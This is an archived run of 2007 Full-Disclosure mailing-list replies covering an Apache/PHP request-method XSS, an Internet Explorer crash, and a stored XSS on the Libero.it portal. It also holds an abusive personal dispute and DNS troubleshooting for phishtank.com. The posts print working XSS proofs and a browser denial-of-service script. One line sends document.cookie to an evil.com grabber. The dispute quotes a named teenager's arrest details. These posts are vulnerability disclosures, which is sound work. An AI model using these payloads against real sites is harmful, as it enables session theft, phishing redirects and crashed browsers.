GET,POST,OPTIONS,TRACE and all that stuff. However this is not true, since Apache accepts requests that look like this: GETscriptalert(document.coookie);/script /test.php HTTP/1.0 And the output for this would be: GETscriptalert(document.coookie);/script Of course it is hard to exploit (I think some Flash might help ;)) and I don't know if it is exploitable at all. But programmers should be warned about this behaviour. You can't trust any variable in the $_SERVER table! Regards Michal Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability
This is a case of poor-programming, on the script coder's part, it is not so much a vunerability. That variable only contains what it is sent by apache. it doesn't parse it. nor is it supposed to. If you want to ensure there is no XSS going on, parse the variable, escape characters, etc as it IS user input. This CAN be a vulnerability with individual scripts, however, it is not a vuln with PHP or Apache. On Monday 23 April 2007 17:31, Michal Majchrowicz wrote: There exist a flaw in a way how Apache and php combination handle the $_SERVER array. If the programmer writes scrip like this: ?php echo $_SERVER['REQUEST_METHOD']; ? He will assume that REQUEST_METHOD can only by: GET,POST,OPTIONS,TRACE and all that stuff. However this is not true, since Apache accepts requests that look like this: GETscriptalert(document.coookie);/script /test.php HTTP/1.0 And the output for this would be: GETscriptalert(document.coookie);/script Of course it is hard to exploit (I think some Flash might help ;)) and I don't know if it is exploitable at all. But programmers should be warned about this behaviour. You can't trust any variable in the $_SERVER table! Regards Michal Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer Crash
This also works under Konqueror. There should be an implimentation on ALL browsers that a loop such large is unacceptable and refuse to even run it. There is no viable reason for a client-side to run a loop through so many itterations. This DoS technique could be abused and iframes with the code could be embedded within popular websites, effectively causing a denial of service to that specific site. On Tuesday 17 April 2007 13:09, J. Oquendo wrote: Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html script var reg = /(.)*/; var z = 'Z'; while (z.length = 999 999 999 999 999 999 999 999 999) z+=z; var boum = reg.exec(z); /script Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Another XSS vulnerability in Italian provider Libero.it
They probably need to redo their entire site's scripts, I wouldn't doubt
there's a few more exploits in there somewhere. -- 2+ exploits within one
site in one month is pretty sad.
On Wednesday 28 March 2007 12:17, LK wrote:
After the report of Rosario Valotta on this ML, another XSS vulnerability
has been found on Libero.it, one of the most important italian ISP
(www.libero.it).
Nothing more than a trivial error but, since Libero.it staff used the
printed media to inform that Rosario's find was just a spot issue, it is
important to demonstrate that this kind of errors are quite more
widespread and to let the Libero staff and management realize that a
potential attack must be avoid by a deep check of the portal.
The vulnerability once again can be found in the Community section
of Libero portal, and the affected functionality is the profile
creation and retrieval
http://digiland.libero.it/profilo.phtml?nick=XssForFuntop=1.
The implementation of this functionality allows the injection of
malicious code in the profile, so that an attacker by visiting his/her
profile can:
1) steal username (in cookie)
2) steal cookies
3) arbitrary redirection for Phishing purpose
The normal URL would be something linked like this:
http://digiland.libero.it/profilo.phtml?nick=Nicktop=1
where Nick is the name of the nick whose profile has been
manipulated or crafted to add arbitrary code.
This vulnerability closely resemble to those in MySpace and other
communities.
So it's nothing really complicated and you can skip on from here on ;)
In admin pages (need to be logged by creating a fake account) on page
http://digiland.libero.it/profilo_add.php?nocache=1175076655
there are two different fields named I miei difetti: (my defects)
and i miei pregi: (my strong points) that accept arbitrary content.
As stated by Rosario, the Libero.it web application performs a simple
parsing of the posted content, so that quote and double-quote (' and )
chars are escaped by putting a \ before of them (both using ASCII and URL
encoding).
While I already had the Rosario's beautiful implementation of a simple
evasion technique I preferred to encode the single char in an old
snippet of mine.
The aim of the snippet (I don't remember if I made it, stole it, stole
only the main idea or where, sorry) is to transform a string into a
series of char numbers to be used with a String.fromCharCode command.
Due to the limitation in size, the function which create the
String.fromCharCode sequence is a detached and ascii value is
decreased of 100 to limit the number of digits.
This is the creation snippet:
script
var toBenc = hettp://www.lastknight.com;
var result = ;
for (var k = 0; k carlo.length; k++)
{
result += (e( + (toBenc .charCodeAt(k) - 100) + )+);
}
document.write(result + br)
/script
So URL http://www.lastknight.com; is rendered as:
e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)
+e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)
+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
Using the two boxes we can use the following code for a POC:
[BOX 1]
script
function e(A) {
return String.fromCharCode(A + 100)
}
alert(document.cookie);
/script
[BOX 2]
script
var k =
e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8);
k +=
e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
alert(k);
window.location = k;
/script
The posting url can be easily modified to an http grabber such as:
http://evil.com/grab?c=+encodeURI(document.cookie);
or (much more dangerous) to a phishing site.
Session Riding and derived problems have not been tested but many italian
security experts are working on it.
A POC url is available (until not deleted) here:
http://digiland.libero.it/profilo.phtml?nick=XssForFuntop=1
Just my 2 cents and thanks to:
Rosario Valotta for the first report, upon which this is based
SharDick for help in JS ;)
Vokda Zen for consultancy and typo-killing ;)
Greetings,
MgpF
Permanent Url: http://www.lastknight.com/libero-xss/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RainbowCrack-Online Drama
Is this an advertizement, an insult, an invite, or what? :P On Tuesday 27 March 2007 11:52, T Biehn wrote: It gets juicier: -- Forwarded Message: -- From: John Harrison [EMAIL PROTECTED] http://mailcenter.comcast.net/wmc/v/wm/46093D690006A5BE3FD12205886172C ECE0A040D030706?cmd=ComposeToadr=johnthedude%40msn%2Ecomsid=c0 To: Travis [EMAIL PROTECTED] http://mailcenter.comcast.net/wmc/v/wm/46093D690006A5BE3FD12205886172C ECE0A040D030706?cmd=ComposeToadr=jimble11%40comcast%2Enetsid=c0 Subject: LIES From the Canadian Bomb Boy Date: Mon, 26 Mar 2007 21:16:02 + http://seclists.org/fulldisclosure/2007/Mar/0462.html Well you missed the criminal charges and subsequent guilty verdict and the fact your parents had massive legal bills **I didn't think it was relevant. you really think that iRainbowcrack wants to be associated with a person so anti **iPod? USA ..and a danger to school kids **you were more than happy to accommodate me when you needed things right? you have history of Bomb Charges , that is not wanted at Rainbowcrack-online **I bet. i wondered why the surname was missed out in that first article , Travis who didnt want to give his surname WHATA DICK U ARE **Mommy and daddy told me not to give out my last name, you also didn't want it. Seventeen year old Travis Biehn was arrested last week and charged with making a terrorist threat against his Philadelphia area high school. It is alleged that the Grade 11 student scrawled a threat on a washroom wall of Central Bucks East High School and then brought it to the attention of some teachers. Biehn's home was searched after other students told the authorities that the teen had told them that he knew how to make a bomb and was planning to use one. The search of his home revealed eight to ten pounds of potassium nitrate, fuses, detonators, and canisters as well as photographs of bomb-making material **See text of appeal / science to see that it wouldn't have made a bomb anyways guess we start there and then a nice pic of u i think http://www.recorder.ca/cp/World/050614/w0614109A.html **What a hottie, where's your pic? oh and an attachment of the threats to take the site down which u tried to make it so that we couldnt do a thing without you agreeing , not bad for such an idle fook , your a waste of space dude , i hear your druggie voice , hope you aint any at home **You mean my requests that you adhere to the contract I got you to agree to? And upon breach my legitimate removal of copyrighted code? and then the best of all , the time you asked me for bots for your KR website scam that you couldnt keep quiet about **You make it seem like common place that people would just randomly ask you for such things. I wonder what kind of people you associate with? HACK 4 LYFE. damn i finding more logs all the time .i got shit loads on you and the great thing is , do uu think ppl will ever do any buisness with someone that cannot be trusted ,,i saw right through your phoney crap , u didnt like it , well thats my 5% on Travis Bomb Boy Biehn **Thats why I've got a decent resume at 18. You start a slannging match man , i welcome any chanllenge to the legallity of **Straight outta Compton... RainbowCrack-Online , the website i setup because you were in Jail , **Bought the domain you mean? check out the reg date , check out the owners , And you think for 1 minute that you got a rite to ask me to show you financial shit, you copied Daniel Hayes code **Actually I had Daniel start me off with some PHP code, he provided me with a subscription system he used before, I adopted and extended it for rainbowcrack-online. Which means I wrote the entire site, as the most recent codebase stands the only thing left of his code is in _ipn.php and added your gay name afetr his ,and by the way , google cache aint **I do have a gay name =[ copyrighted even if u do copyrite the code that u didnt right To sum up you started this , and you aint got a damn clue what you are doing , you lie about MY company and you think that no retalliation will follow , **You mean sending me incomprehensible e-mails? Dude i got shit on you that you would not dream off , and its all logged u see i log all msn and archive it ,, **Lets hope you don't get raided then. Right johny boy? and also MIRC from 5 yrs ago.. I WILL SEND YOU THE TEXT SO U CAN ATTACH TO THE RESUME YOU HAVE ON WEB,,, AND I HOPE YOUR EMPLOYERS NOW KNOW **Fuck yes, it'll only get me more business. YOU WANT SUMMIT IN THIS WORLD ... YOU GOTTA WORK FOR IT ,, NOT TRY TO BLACKMAIL AFTER YOU SABOTAGE YOUR OWN CODE **You mean post this to full disclosure and be completely transparent about the whole thing? Also, storing my copyrighted code offsite because I didn't trust you enough is not 'sabotage' it's called not being stupid.
Re: [Full-disclosure] I'm not the only one who can't resolve phishtank.com, but some can..
I get a valid answer as well: Tracing to phishtank.com[a] via 127.0.0.1, maximum of 3 retries 127.0.0.1 (127.0.0.1) |\___ auth3.opendns.com [phishtank.com] (208.69.39.2) Got authoritative answer |\___ auth2.opendns.com [phishtank.com] (208.67.219.54) Got authoritative answer \___ auth1.opendns.com [phishtank.com] (38.99.14.20) Got authoritative answer auth1.opendns.com (38.99.14.20) phishtank.com - 66.135.40.79 auth2.opendns.com (208.67.219.54) phishtank.com - 66.135.40.79 auth3.opendns.com (208.69.39.2) phishtank.com - 66.135.40.79 What'd I'd do is throw it in your hosts file temporarily until DNS behaves On Sunday 25 March 2007 15:53, Tim wrote: Looks fine for me: ; DiG 9.3.4 phishtank.com ;; global options: printcmd ;; Got answer: ;; -HEADER- opcode: QUERY, status: NOERROR, id: 26391 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;phishtank.com. IN A ;; ANSWER SECTION: phishtank.com.42 IN A 66.135.40.79 ;; Query time: 4 msec ;; SERVER: 10.0.1.1#53(10.0.1.1) ;; WHEN: Sun Mar 25 15:49:29 2007 ;; MSG SIZE rcvd: 47 - Do some of you happen to have a poisoned MS or Symantec DNS cache upstream of you? (See [1] fmi.) tim 1. http://www.incidents.org/presentations/dnspoisoning.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phishtank.com Gone?
I get a valid answer: ; DiG 9.3.2 phishtank.com ;; global options: printcmd ;; Got answer: ;; -HEADER- opcode: QUERY, status: NOERROR, id: 45905 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 0 ;; QUESTION SECTION: ;phishtank.com. IN A ;; ANSWER SECTION: phishtank.com. 60 IN A 66.135.40.79 ;; AUTHORITY SECTION: phishtank.com. 3536IN NS auth2.opendns.com. phishtank.com. 3536IN NS auth3.opendns.com. phishtank.com. 3536IN NS auth1.opendns.com. ;; Query time: 42 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Sun Mar 25 15:42:02 2007 ;; MSG SIZE rcvd: 115 What'd I'd do is throw it in your hosts file temporarily until DNS behaves On Sunday 25 March 2007 15:31, Anshuman G wrote: Humm, Same for me. [EMAIL PROTECTED]:~ dig phishtank.com | grep A ;; -HEADER- opcode: QUERY, status: NOERROR, id: 32352 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;phishtank.com. IN A ;; ANSWER SECTION: phishtank.com. 6352IN A 127.0.0.1 ;; AUTHORITY SECTION: On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote: On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote: Phishtank.com resolves to 127.0.0.1, has someone taken it offline? No, I'm still getting to the site. I don't suppose mcafee.com, symantec.com and a lot of other security domains also resolve to 127.0.0.1 for you, do they? Larry Seltzer It's just phishtank.com for me, the others resolve fine. My checks were run from linux boxes ;) localhost address checking from Shaw in Calgary, normal result checking from an Interland server in the US. Tremaine Lea Network Security Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phishtank.com Gone?
I get a valid answer: phishtank.com. 3 IN A 66.135.40.79 What'd I'd do is throw it in your hosts file temporarily until DNS behaves On Sunday 25 March 2007 15:31, Anshuman G wrote: Humm, Same for me. [EMAIL PROTECTED]:~ dig phishtank.com | grep A ;; -HEADER- opcode: QUERY, status: NOERROR, id: 32352 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;phishtank.com. IN A ;; ANSWER SECTION: phishtank.com. 6352IN A 127.0.0.1 ;; AUTHORITY SECTION: On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote: On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote: Phishtank.com resolves to 127.0.0.1, has someone taken it offline? No, I'm still getting to the site. I don't suppose mcafee.com, symantec.com and a lot of other security domains also resolve to 127.0.0.1 for you, do they? Larry Seltzer It's just phishtank.com for me, the others resolve fine. My checks were run from linux boxes ;) localhost address checking from Shaw in Calgary, normal result checking from an Interland server in the US. Tremaine Lea Network Security Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
